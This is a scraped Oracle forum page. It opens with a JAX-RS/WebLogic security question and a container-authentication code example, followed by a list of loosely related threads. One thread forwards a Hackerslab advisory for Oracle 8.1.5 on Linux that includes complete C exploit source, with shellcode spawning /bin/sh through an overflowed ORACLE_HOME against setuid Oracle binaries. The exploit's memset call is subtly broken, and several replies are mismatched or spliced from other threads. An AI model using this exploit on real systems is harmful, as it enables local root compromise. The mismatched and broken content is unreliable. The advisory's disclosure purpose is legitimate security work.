JAX-RS security: existing/applicable Oracle docs?
Hi,
I intend to create some RESTful APIs for a product using the Jersey JAX-RS RI version 1.9 deployed on Oracle WLS 11g (10.3.6), as described in Programming RESTful Web Services - 11g Release 1 (10.3.6), but there is no security documentation available for Oracle WLS 11g (10.3.6). I have, however, found some for Oracle WLS 12c (12.1.1) on the web page Securing RESTful Web Services - 12c Release 1 (12.1.1).
My question is: are the security mechanisms described on the Oracle WLS 12c (12.1.1) web page Securing RESTful Web Services - 12c Release 1 (12.1.1) also applicable to Oracle WLS 11g (10.3.6)?
Also, where can I find potential issues around JAX-RS/security/Jersey in the context of Oracle WebLogic Server?
Thanks in advance,
Dim
Hello,
A couple of options:
1. Create a WebLogic Web Service Project with the 12c runtime.
a. File->New->Web Service Project
b. Select your 12c runtime
You should have a project with JAX-RS on the Java build path.
2. Create a standard J2EE project, i.e. a Web Project.
a. Create a Dynamic Web Project
b. Select your 12c runtime
c. Right-click the Project->Properties->Java Build Path->Libraries->Add External JARs, then navigate and select "WLS 12c Dir"\modules\com.sun.jersey.core_"version".jar
This should allow the resolution of the javax.ws.rs.* annotations.
Additionally, you may need to right-click the Deployment Descriptor of your project and select Generate Deployment Descriptor Stub. Subsequently add the following:
<servlet>
    <servlet-name>JAX-RS Application</servlet-name>
    <servlet-class>com.sun.jersey.spi.container.servlet.ServletContainer</servlet-class>
    <load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>JAX-RS Application</servlet-name>
    <!-- path mapping: the Servlet spec expects the "/*" form here, not a bare "*" -->
    <url-pattern>/*</url-pattern>
</servlet-mapping>
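As an added example (not code from this thread or from Oracle's documentation), the resource below shows the application-side half of the model the 12c "Securing RESTful Web Services" guide describes: the servlet container authenticates the caller according to web.xml (security-constraint plus login-config), and the JAX-RS resource only reads the outcome through javax.ws.rs.core.SecurityContext and decides whether to serve. Everything used is standard JAX-RS 1.1 API, so it compiles against the same Jersey 1.9 jar on an 11g (10.3.6) build path as on 12c. The package name, the /orders path and the role name OrderViewer are assumptions.

```java
package example.rest;                        // hypothetical package, not from the thread

import java.security.Principal;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import javax.ws.rs.core.SecurityContext;

/**
 * Resource that refuses to serve unless the servlet container has already
 * authenticated the caller and the caller holds the expected role.
 * The resource never sees or checks passwords itself; that stays in the
 * container (web.xml login-config plus the WebLogic security realm).
 */
@Path("/orders")
public class OrdersResource {

    // Assumed role name. It must be declared as a <security-role> in web.xml and
    // mapped to a realm group or user in weblogic.xml for isUserInRole() to be true.
    static final String VIEWER_ROLE = "OrderViewer";

    @GET
    @Produces(MediaType.TEXT_PLAIN)
    public Response listOrders(@Context SecurityContext sc) {
        Response denial = deny(sc);
        if (denial != null) {
            return denial;
        }
        // Reached only for an authenticated caller in VIEWER_ROLE.
        return Response.ok("orders visible to " + sc.getUserPrincipal().getName()).build();
    }

    /**
     * Returns a 401/403 response if the request must not be served, or null if
     * it may proceed. Kept separate so every method of the resource can reuse
     * the same checks instead of re-implementing them.
     */
    static Response deny(SecurityContext sc) {
        Principal caller = sc.getUserPrincipal();
        if (caller == null) {
            // No container authentication happened: either this URL is not
            // covered by a <security-constraint>, or the client sent no
            // credentials. Challenge instead of serving the data.
            return Response.status(Response.Status.UNAUTHORIZED)
                           .header("WWW-Authenticate", "Basic realm=\"orders\"")
                           .build();
        }
        if (!sc.isSecure()) {
            // Credentials were accepted over plain HTTP. The right place to
            // enforce TLS is <transport-guarantee>CONFIDENTIAL</transport-guarantee>
            // in web.xml; this check is only a backstop for a missing constraint.
            return Response.status(Response.Status.FORBIDDEN).build();
        }
        if (!sc.isUserInRole(VIEWER_ROLE)) {
            // Authenticated but not authorised for this resource.
            return Response.status(Response.Status.FORBIDDEN).build();
        }
        return null;
    }
}
```

For this to do anything, web.xml also needs a <security-constraint> whose <url-pattern> covers the Jersey servlet mapping above, with an <auth-constraint> naming the role, a <login-config> (BASIC or CLIENT-CERT are the usual choices for an API), a <security-role> declaring the role, and a role-to-group mapping in weblogic.xml. Without the constraint the container never authenticates, getUserPrincipal() stays null, and the resource answers 401 for every request, which is the safe failure mode.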
Similar Messages
-
Hi,
i have been trying to setup security, ws addressing for a jax ws service. I am not able to find a suitable example or documentation. Any pointers? The weblogic documentation are mostly for jax rpc.
Thanks in advance,
-S
An example can be found here: http://docs.oracle.com/cd/E21764_01/web.1111/e13713/message.htm#CDEBIJEJ
which is part of the document Securing Web Services (http://docs.oracle.com/cd/E21764_01/web.1111/e13713/toc.htm)
-
Security when using oracle text
Hello,
We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
He told us that this is a security problem : giving oracle password gives access to the file system.
Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
Thanks a lot!
raford wrote:
This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
You can restrict access to this feature by only allowing users having a specific role to use it - see
http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
(NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
It's the database process itself which accesses the files, so it will always access them as the owner of the database process; there's no way to change that.
What do you mean when you said "FILE_DATASTORE to index documents on disk, rather than in the file system"?
-
Security Evaluation of Oracle Application Server
Are there any published documents on security evaluation of Oracle Application Server?
Is it secure as a tool against some attacks? For example, are the following vulnerabilities, where applicable to the server, dealt with by it, or should they be handled by the application?
failure to restrict url access,
broken authentication and session management
insecure cryptographic storage,
injection flaws
failure to restrict directory browsing
Are there available document that we can refer to on these issues?
Regards
Farbod
Thank you again.
Can you advise on this part of my message also?
"Also I see in oracle recommended architectures that there is a firewall between each http server and application server. Does the built in OHS in OAS provide the firewall? or I need to install another firewall?"
I am going to explain it but I think it is completely inconsistent with the thread title which I got some of my answers in, so let me start a new thread here:
Application Server Recommended Deployment Architectures, How to?
Thanks for your useful inputs.
Best Regards,
Farbod -
Security vulnerability in Oracle 8.1.5
The following email was forwarded to me about possible security vulnerabilities.
I am looking for verification from both Oracle and the user community.
================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================
File : Oracle 8.1.5
SYSTEM : LINUX
Tested by RedHat Linux 6.2
INFO :
There are two security vulnerabilities in Oracle.
1. buffer overflow
It is possible to create a buffer overflow using "ORACLE_HOME",
one of the environment variables of Oracle.
Oracle applications that are vulnerable to buffer overflow are as follows:
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
These applications allow an attacker to execute a buffer overflow exploit.
2. Log-files created
When a user executes one of the Oracle applications such as names, oracle or tnslsnr,
the following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
SOLUTION
Contact your vendor for a patch or close setuid permission.
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
==-------------------------------------------------------------------------------==
* ** ** * [email protected] [yong-jun, kim]
* ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"

char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d"             /* jmp callz */
/* start: */
"\x5e"                 /* popl %esi */
"\x29\xc0"             /* subl %eax, %eax */
"\x88\x46\x07"         /* movb %al, 0x07(%esi) */
"\x89\x46\x0c"         /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08"         /* movl %esi, 0x08(%esi) */
"\xb0\x0b"             /* movb $0x0b, %al */
"\x87\xf3"             /* xchgl %esi, %ebx */
"\x8d\x4b\x08"         /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c"         /* leal 0x0c(%ebx), %edx */
"\xcd\x80"             /* int $0x80 */
"\x29\xc0"             /* subl %eax, %eax */
"\x40"                 /* incl %eax */
"\xcd\x80"             /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";

/* returns the current stack pointer (i386 only) */
unsigned long getesp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, binary[120];
    long *addr_ptr, addr;
    int bsize = BUFFER;
    int i, offset;

    offset = 0;
    if (argc > 1) offset = atoi(argv[1]);
    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;
    memset(buff, bsize/2, NOP);
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    /* the oversized value is passed to the target through its environment */
    setenv("ORACLE_HOME", buff, 1);
    printf("[ offset:%d buffer=%d ret:0x%x ]\n",
           offset, strlen(buff), addr);
    system(PATH);
}
Hi Peter,
I was told that Oracle8 and Oracle8i Parallel Server on IBM
RS/6000 AIX comes with its own Lock Manager and this LM does not
rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
(Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
HACMP but came with a special LM.)
Cluster-wide Filesystems are not used for OPS on Unix, as far as
I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
Logical Volumes on AIX).
So I guess it should be possible for Oracle to port OPS to Linux.
No special Cluster-Services would be needed for OPS on Linux,
just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
100BaseT).
Peter Sechser (guest) wrote:
: Dave,
: Parallel Server needs some cluster services in order to
: communicate between several nodes. So, the operating system has
: to offer things like inter-node communication services,
: cluster-wide lock communication services and a clusterwide
: filesystem. I'm not quite sure, to what degree Linux offers/will
: offer these services.
: Peter
-
WLS 8.1 MDBs, Websphere MQ QMs and Security Exits....
Hi:
I am testing an MDB that is listening on a Websphere MQ 5.3 Queue. For security,
I have secured the Server Connection Channel of the Queue Manager (to which the
Queue belongs to) with a Security Exit.
Using the Foreign JMS Servers section in the Admin console, I defined a 'Foreign
JMS Connection Factory' that has the userid & password that is supposed to be
passed to Websphere MQ.
When the MDB comes up, it throws a SecurityException. In the background, the Security
Exit log indicates that the MDB tried to make multiple connections to the Server
Channel. The Deployment descriptor has the 'MAX BEANS IN FREE POOL' set to 1.
My issues are:
1. When the MDB comes up the Server Connection Channel shows multiple connections.
I know there is only one MDB, so I am curious why there would be multiple connections
to the same Channel.
2. The Security Exit log shows that the userid and password was passed on to MQ
certain times and other times it was not. The net result is the Security Exit
rejected the MDB Connections (when the userid and pwd was blanks) and the Bean
did not come up properly.
I am concerned with Issue 2. Because, all I am able to control is giving the userid
and pwd in the Foreign JMS Server section. WLS 8.1 is supposed to pass on the
credentials properly to MQ when needed. Is WLS 8.1 NOT doing what is expected
or am I missing something?
What is the procedure to deploy a WLS 81 MDB that is listening on a queue whose
QM is secured by an MQ Security Exit.
Please help!
When you deploy any EJB or servlet that uses the "resource-reference", the
container (after a short delay) tries to make a connection to get the
XAResource for that JMS provider. It then registers that with JTA. That way,
JTA can perform transaction recovery on the JMS provider sooner rather than
later. (If we waited to register the MQSeries resource with JTA until you
used it, then if MQ had prepared transactions, they wouldn't be resolved
until you actually tried to send a message.)
As for the "multiple connections", I believe that the MQSeries JMS library
uses a single MQ "connection handle" for every JMS session. (That's because
MQ connection handles aren't thread-safe.) In our pool of the JMS Session
objects, we open more than one session initially, so that might be why
you're seeing multiple connections.
You can monitor the pooling of the JMS sessions using the console. Click on
your server in the "servers" tab in the left-hand tree view, then on
"Monitoring", then on "JMS", and then on "Monitor Pooled JMS Connections".
greg
"Sridhar Krishnaswamy" <[email protected]> wrote in message
news:[email protected]...
>
> I tried the steps you have mentioned. But the userid still does not come across
> to MQSeries. So, I will follow up with Support. The MDB is passing on the credentials
> fine when using the same QCF to put the messages to.
>
> On the issue of multiple connections, you are right. The connections are because
> of the resource-ref entries. Though I am not sure why the MDB is actually trying
> to establish multiple connections for every resource-ref entry (because the pooling
> mechanism kicks in?). Also, in my design, some of the resource-ref are actually
> 'stand-bys' to be used only if the MDB fails to put the message using the primary
> resource-ref entry. I would have thought that the physical connections will actually
> be made when the call for looking up the QCF is made by the bean or createQueueConnection
> called. Just for my knowledge, I would like to know why the Container is establishing
> the connections upfront.
>
> As always, I really appreciate your help, Greg.
>
> Thanks,
> Sridhar
>
> "Greg Brail" <[email protected]> wrote:
> >At the moment, the username and password used to receive messages come from
> >a different place, and not from the "Foreign JMS Connection Factory"
> >screen. (Yes, I realize that this is confusing.) To do what you want, you
> >need to define a "credential mapping":
> >
> >-- Create a WebLogic Server user using the "security" section of the
> >console, and assign the password that you will need to connect to MQ.
> >
> >-- Right-click on your MDB in the left-hand tree view, and select "Define
> >Roles and Policies for Individual Beans"
> >
> >-- You should see a list of MDBs on the screen. Click on "define credential
> >mapping". (I forget the exact wording, but it's something like that.)
> >
> >-- On this screen, you enter the MQSeries username that you'll need to set,
> >and the WebLogic user that you created in the first step. It then uses the
> >password from this WebLogic username.
> >
> >If you have trouble with this, please call support. I know that some people
> >have had trouble with this particular feature.
> >
> >I'm not sure about the multiple connections. Is it possible that you have a
> >"resource-reference" declared for MQ somewhere?
> >
> > greg
> >
-
Small office (5 users) - Accounting - wanting to secure ingress/egress of docs
I haven't seen this answered for an office of this size. I have the need for a relatively cheap software package or guidelines (I'll still keep the search active) for how to block, or at least alert, of sensitive data from leaving the company. I know that I'll have challenges on:
1. Blocking certain attachment types from being sent, via webmail, web site attach, email. I am sure someone's written a how-to but I'm darned if I can find it. Suggestions?
2. Blocking certain programs from running (whitelist/blacklist) - not really wanting to be deep in their pockets every time the application is updated, so not sure if a hash list would be a good idea based on a GPO security policy, or if black/white lists are best?
3. Web blocking - I'm thinking I am wanting to...
This topic first appeared in the Spiceworks Community
Hi guys,
First, I've done a lot of searching on the web and read a few different threads on Spiceworks regarding HIPAA compliance and encrypting hard drives. Specifically these two threads:
http://community.spiceworks.com/topic/596465-encryption-for-hipaa-compliance
http://community.spiceworks.com/topic/320759-how-are-you-handling-hipaa-s-latest-data-at-rest-rules
So I have a new client that's in the medical field. He has a server that's about two-three years old that looks as if it was built with budget at the forefront. It's a whitebox with an Asus P8H77-V motherboard, 16 GB of RAM, an i3 processor & two 1 TB SATA drives using RAID 1 right off the motherboard. The roles it has: DNS/DHCP/File server/AD. Side note - even though it's been set up for AD none of the computers are on the domain. Their EMR software is Tracknet & the data is being stored...
-
Multi security groups in Oracle apps hrms
Hi All,
Could you please let us know how to enable or disable multi security groups in Oracle Apps hrms?
Thanks,
Anil
If you have access to Oracle Help-on-line check it there
-
Security features in Oracle Apps (Oracle Financials)
Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.
If you have access to Oracle Help-on-line check it there
-
Looking for Oracle Doc on RAC...
Hi,
I am looking for an Oracle doc (Metalink or whatever) that will give me Oracle's recommendations on how to best configure a 4-node RAC environment on RHEL4. We are running mainly a data warehouse shop here and we are trying to best configure our network for this... things like NIC cards (1 gb 2, 2gb, etc, etc), interconnect, etc, etc... anything would help us.
Is there such a doc out there?
http://www.grumpy-dba.com
http://blogs.oracle.com/AlejandroVargas/gems/RACDetailDesignandBestPracti.pdf
Good and useful stuff in the blog.
Ravi -
Security Measures of Oracle e-business Suite
Hi ,
Can anyone please provide any link/material on Security Measures of Oracle e-business Suite.
I need this stuff pretty urgently.
Thanks in advance,
Sandy...
Best Practices for Securing Oracle E-Business Suite (Metalink Note 189367.1)
-
Security issues on Oracle Database (10g)
Hello,
I need to make a security manual for Oracle (10g) databases. This has to be some sort of checklist to assure a database is secure. I am thinking of encryption, least privilege, limit access, etc etc. I am sure this has been done before. Please help me with links to documents about this.
Kind regards,
Rob Schenk
(Funny thing - Oracle has hired people to write documentation and has placed it online for anyone to read.)
You just might find what you need in the "Security Guide" at http://www.oracle.com/pls/db102/portal.portal_db?selected=1
If documentation is not sufficient, I recommend http://www.amazon.com/gp/product/0974372749/ -
Security Rules in Oracle Financials GL
I have defined security rules in Oracle Financials GL version 11.0.3. The security rules can be applied in form level.
e.g For account inquiry, only limited accounts can be viewed.
But for all reports in Oracle Financials, it's not restricted by the rules. How can I apply those rules in reports as well?
Unfortunately, data in standard and bespoke Oracle reports is not restricted by security rules by default.
Security can be enabled for FSG reports.
If you need security rules to be applied to standard reports, I am afraid, you need customization. -
Viewing Oracle docs on a Kindle?
I'm thinking of buying a Kindle, solely to view technical PDFs.
Has anyone viewed the Oracle doc PDFs (e.g., from tahiti.oracle.com) on a Kindle? I understand PDF viewability is kind of hit-or-miss.
I owned a Kindle and read Oracle documents on mine before I sold it, and yes, the readability was great. My only problem was when reading text books. I realized that reading text books the old way was better for me than on an e-reader. So I sold mine. It was not because of the look and feel of the document, but I could not just navigate faster, making references, checking sources back and forward.
Edited by: Albert Zaza on Nov 29, 2010 12:02 PM -
Applying security patch to Oracle 10G on Linux
Hello,
I'm new to Oracle DBA world, need to apply security patch to Oracle 10G on Linux server, any tips and notes would be appreciated.
thanks
Sam
Manish,
1. I have to upgrade the database version from 10.2.0.2 to 10.2.0.4 on Linux. Is there any proper documentation which will help me out?
Please refer to the following document.
Note: 454750.1 - Oracle Apps Release 12 with Oracle Database 10.2.0 interoperability notes
https://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=454750.1
2. What are the types of oracle database patches? what is the proper procedure to apply those kind of patches to Oracle 10g on Linux?
Most of the patches in this upgrade are database patches (which should be applied using opatch). The main upgrade patch (Patch 6810189 - 10.2.0.4 patch set) should be applied using Oracle Universal Installer (runInstaller).
Always follow the steps in the patch README file before applying any patch.
Regards,
Hussein